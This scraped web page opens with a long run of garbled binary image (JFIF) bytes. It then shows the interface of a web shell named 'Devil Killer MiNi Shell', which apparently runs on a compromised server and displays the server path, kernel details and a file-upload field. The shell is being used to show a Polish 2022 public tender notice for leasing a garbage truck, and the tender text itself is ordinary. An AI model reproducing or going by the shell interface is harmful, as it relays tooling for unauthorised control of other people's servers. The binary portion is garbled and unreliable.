JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220414/0012249802-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa w formie leasingu operacyjnego fabrycznie nowego podwozia 3 osiowego wraz z fabrycznie nową zabudową komunalną typu „śmieciarka”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">EKOREC SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 240720642</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lędzińska 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lędziny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-143</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323267990.</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ekorec@poczta.onet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ekorec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka Gminna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa w formie leasingu operacyjnego fabrycznie nowego podwozia 3 osiowego wraz z fabrycznie nową zabudową komunalną typu „śmieciarka”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-52e1dcb4-bbd3-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00122498</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. <br/>2.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. <br/>3.	Oferta powinna być:<br/>a.	sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b.	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>c.	podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>4.	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>5.	W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>6.	Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa.<br/>7.	Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>8.	Zgodnie z definicją dokumentu elektronicznego z art.3 ustęp 2 Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo przez podwykonawcę.<br/>9.	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Załącznik do postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DŚ/01/2022 r.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia<br/><br/>1)	Przedmiotem zamówienia jest zakup i dostawa 1 szt. fabrycznie nowego, wyprodukowanego nie wcześniej niż w 2022 r. i wcześniej nie rejestrowanego samochodu przeznaczonego do zbierania odpadów komunalnych, jednokomorowego, z tylnym załadunkiem odpadów na podwoziu trzyosiowym.<br/>2)	Parametry i dane techniczne, jakie musi spełniać pojazd będący przedmiotem zamówienia:<br/><br/>PODWOZIE:<br/>1)	Typ podwozia: trzyosiowe w konfiguracji osi 6x2*4 (druga oś napędowa, trzecia skrętna)<br/>2)	Podwozie o DMC min. 26 ton przystosowane do zabudowy bezpylnej<br/>3)	Rozstaw osi od 3550 do 4000 mm<br/>4)	Minimalna nośność techniczna przedniego zawieszenia min. 8000 kg,<br/>5)	Minimalna nośność techniczna zawieszenia tylnego wózka min. 19 000 kg,<br/>6)	Zawieszenie przednie – resory, tylne – pneumatyczne. Kontrola zawieszenia tylnego z kabiny lub pilotem.<br/>7)	Silnik o mocy min. 300 kM i max. momencie obrotowym min. 1400 Nm<br/>8)	Norma emisji spalin Euro 6 <br/>9)	Pojemność skokowa silnika od 9000 cm3 do 10900 cm3<br/>10)	Skrzynia biegów zautomatyzowana lub automatyczna ze sprzęgłem hydrokinetycznym, wyposażona w bieg pełzający umożliwiający manewrowanie z małymi prędkościami<br/>11)	Przystawka odbioru mocy odsilnikowa<br/>12)	Światła do jazdy dziennej LED,<br/>13)	Blokada mechanizmu różnicowego osi napędowej<br/>14)	Podgrzewany filtr paliwa,<br/>15)	2 akumulatory min. 210 Ah,<br/>16)	Hamulce tarczowe osi przedniej i tylnej,<br/>17)	Obręcze stalowe z oponami w rozmiarze 315/80 R22.5 dostosowane nośnością do max technicznej nośności osi podwozia.<br/>18)	Zbiornik paliwa min 200 litrów z zamykanym na klucz korkiem<br/>19)	Zbiornik AdBlue min 45 l,<br/>20)	Trójkąt ostrzegawczy, gaśnica, kpl. kluczy z podnośnikiem min 10 ton,<br/>21)	Min dwa kliny zabezpieczające pojazd przed przemieszczaniem na terenie pochyłym,<br/>22)	Przedni zaczep holowniczy,<br/>23)	Systemy ABS, EBS, ESP<br/>24)	Skrzynia narzędziowa na ramie pojazdu pojemności 70-100 dm3 zamykana na klucz<br/>25)	Kabina trzy miejscowa (dzienna)<br/>26)	Kolor kabiny biały<br/>27)	Gumowe dywaniki podłogowe,<br/>28)	Pokrowce na siedzenia<br/>29)	Kierownica po lewej stronie, regulowana kolumna kierownicy<br/>30)	Podgrzewane i elektrycznie regulowane lusterka wsteczne prawe i lewe oraz podgrzewane lusterka rampowe (przednie) i krawężnikowe<br/>31)	Elektrycznie sterowane podnośniki szyb drzwi kierowcy i pasażera,<br/>32)	Fotel kierowcy z zawieszeniem pneumatycznym<br/>33)	Komputer pokładowy z wyświetlaczem w języku polskim<br/>34)	Immobilizer fabryczny,<br/>35)	Centralny zamek z pilotem<br/>36)	Klimatyzacja automatyczna<br/>37)	Wyświetlacz z komputerem pokładowym w języku polskim<br/>38)	Boczne osłony anty-rowerowe fabryczne <br/>39)	Apteczka,<br/>40)	Wyjście adaptacyjne do podłączenia urządzenia GPS<br/>41)	Radio<br/>42)	Gniazdo w kabinie 12V- i 24V <br/>43)	Koło zapasowe oś przednia (dołączone luzem),<br/>44)	Przyłącze pneumatyczne pompowania kół wraz z przewodem i manometrem,<br/>45)	Wymagana homologacja pojazdu kompletnego<br/>46)	Dwa komplety kluczy<br/><br/>ZABUDOWA:<br/>1.	Skrzynia ładunkowa zabudowy o owalnym kształcie, bez żebrowa<br/>2.	Zabudowa skrzyniowa fabrycznie nowa z urządzeniem załadowczym tylnym, przeznaczona do zbierania stałych odpadów gromadzonych w pojemnikach komunalnych, surowców wtórnych i odpadów wielkogabarytowych<br/>3.	Skrzynia ładunkowa całkowicie spawana, szczelna, wykonana z blachy trudnościeralnej<br/>4.	Pojemność skrzyni ładunkowej min. 20 m3<br/>5.	Objętość kosza zasypowego odwłoka min. 1,5 m3<br/>6.	Szerokość wrzutu do kosza zasypowego min. 220 cm<br/>7.	Możliwość obniżenia krawędzi kosza zasypowego do max. 120 cm od ziemi.<br/>8.	Drzwi rewizyjne, kontrolowane czujnikiem bezpieczeństwa, które zapewniają łatwy dostęp do wnętrza skrzyni, w celu czyszczenia i konserwacji<br/>9.	Dno wanny załadowczej wykonane z blachy trudnościeralnej o grubości min. 8 mm<br/>10.	Dolna część odwłoka wyposażona w kulowy zawór odpływowy ze stali nierdzewnej do odprowadzania nagromadzonych płynów<br/>11.	Odwłok uchylny do góry<br/>12.	Boczne ściany dna wanny załadowczej wykonane z blachy trudnościeralnej <br/>13.	Mechanizm zgniatania liniowo – płytowy (szufladowy) lub jarzmowy<br/>14.	Napęd zabudowy od przystawki dosilnikowej<br/>15.	Sterowanie mechanizmem załadowczym prasy w cyklu automatycznym, ciągłym oraz pojedynczym<br/>16.	Sterowanie płytą wypychającą (wysuwanie i wsuwanie) z kabiny kierowcy oraz z boku zabudowy.<br/>17.	Skrzynka sterownicza umieszczona po prawej stronie wrzutnika musi posiadać min. następujące funkcje: sterowanie wrzutnikiem, start prasy, sygnał dźwiękowy, wyłącznik bezpieczeństwa<br/>18.	Sterowanie hydrauliczne wrzutnika proporcjonalne<br/>19.	Dwa siłowniki prasy zgniatającej umieszczone na zewnątrz odwłoka (w przypadku jarzmowego systemu zgniotu dopuszczone siłowniki wewnątrz odwłoka)<br/>20.	Układ uwalniania zakleszczonych pojemników<br/>21.	Minimum dwa wyłączniki bezpieczeństwa (stop awaryjny) umieszczone po obu stronach zabudowy, wyłącznik bezpieczeństwa w kabinie kierowcy<br/>22.	Minimalny stopień zagęszczania odpadów 5:1<br/>23.	Wrzutnik dostosowany do pojemników od 110 l. do 1100 l. (metalowe i plastikowe)<br/>24.	Możliwość wykonania autodiagnozy sprawności układu elektrycznego<br/>25.	Możliwość odczytu w urządzeniu rejestrującym liczby cykli m.in.:<br/>- prasy zagęszczającej<br/>- podnoszenia i opuszczania odwłoka<br/>- czasu pracy pompy hydraulicznej<br/>26.	Kamera zainstalowana z tylu zabudowy, monitor w kabinie kierowcy<br/>27.	Sterowniki wrzutnika umieszczone z obu stron odwłoka<br/>28.	Zabudowa dwukrotnie gruntowana i lakierowana na kolor biały, zbieżny z kolorem kabiny podwozia<br/>29.	Oświetlenie drogowe zgodnie z obecnie obowiązującymi przepisami ruchu drogowego<br/>30.	Światło alarmowe „kogut” z tyłu zabudowy <br/>31.	Lampa zespolona nad kabiną z podwójnymi światłami ostrzegawczymi i napisem „EKOREC Sp. z o.o.”<br/>32.	Dodatkowe oświetlenie za kabiną kierowcy doświetlające obszar pracy z boków pojazdu<br/>33.	Dwa stopnie dla ładowaczy wraz z czujnikami, informującymi kierowcę o ich zajętości<br/>34.	System centralnego smarowania na smar nieprogresywny z elektronicznym sterowaniem – zmiana częstotliwości smarowania w min. 3 zakresach. <br/>35.	Zabudowa wykonana zgodnie z obecnie obowiązującymi normami w tym EN 1501-1 z późniejszymi zmianami<br/>36.	Zabudowa posiada deklarację zgodności CE 79<br/>37.	Pojemnik z wodą do mycia rąk o poj. min 20 l. z dozownikiem na płyn do mycia rąk<br/>38.	Uchwyty do zamontowania miotły i łopaty<br/>Szczegółowy opis zawarto w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34130000-7 - Pojazdy silnikowe do transportu towarów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1	Cena <br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/><br/>gdzie: <br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w ofercie <br/> 3	Skrócenie terminu wykonania zamówienia <br/>Liczba punktów = (Tof/Tmax) * 100 * waga<br/><br/><br/>gdzie:<br/>Tof - liczba dni powodująca skrócenie terminu wskazana w ofercie.<br/>Tmax - największa liczba dni powodująca skrócenie terminu wykonania zamówienia spośród wszystkich ofert. <br/><br/>minimalny termin dostawy 30 dni od dnia podpisania umowy, maksymalny termin dostawy to 90 dni od dnia podpisania umowy. (tj. maksymalnie wykonawca może skrócić termin dostawy o 60 dni).<br/>Należy wskazać konkretną liczbę dni skrócenia terminu wykonania zamówienia (np. 10 dni).<br/>W przypadku niewskazania przez wykonawcę skrócenia terminu o daną liczbę dni, zamawiający będzie oceniał ofertę tak, jakby wykonawca wskazał 0 dni skrócenia terminu, z terminem realizacji 90 dni od dnia podpisania umowy. <br/>Termin realizacji zamówienie określony przez zamawiając (90 dni od podpisania umowy jest terminem maksymalnym, niezbędnym do oceny przez zamawiającego, iż oferta jest zgodna ze Specyfikacją Warunków Zamówienia.)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu dostawy pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolności do występowania w obrocie gospodarczym:<br/>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku. <br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to wynika z odrębnych przepisów:<br/>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.<br/>3.	Sytuacji ekonomicznej lub finansowej:<br/>- zamawiający nie dokonuje opisu sposobu oceny spełniania warunku. <br/>4.	Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, wykonał należycie co najmniej dwie dostawy samochodów specjalistycznych o wartości nie mniejszej niż 600.000,00 zł. – netto każda. <br/>Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	Oświadczenie wykonawcy, w zakresie art 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą. Który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 5 do SWZ.<br/>b.	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. ł pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia <br/> działalności jest krótszy -w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat <br/> wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz <br/> załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy <br/> czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/> przez podmiot, na rzecz którego dostawy zostały wykonane; wzór wykazu dostaw <br/> stanowi Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Opisu oferowanego kompletnego pojazdu. Z dostarczonego opisu musi jasno wynikać rok produkcji pojazdu, urządzeń, opis musi odpowiadać wymaganiom Zamawiającego, wykaz musi być precyzyjny i zawierać parametry techniczne dostarczanego pojazdu wraz z urządzeniami. <br/>- Zamawiający dopuszcza uzupełnienie środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opisu oferowanego kompletnego pojazdu. Z dostarczonego opisu musi jasno 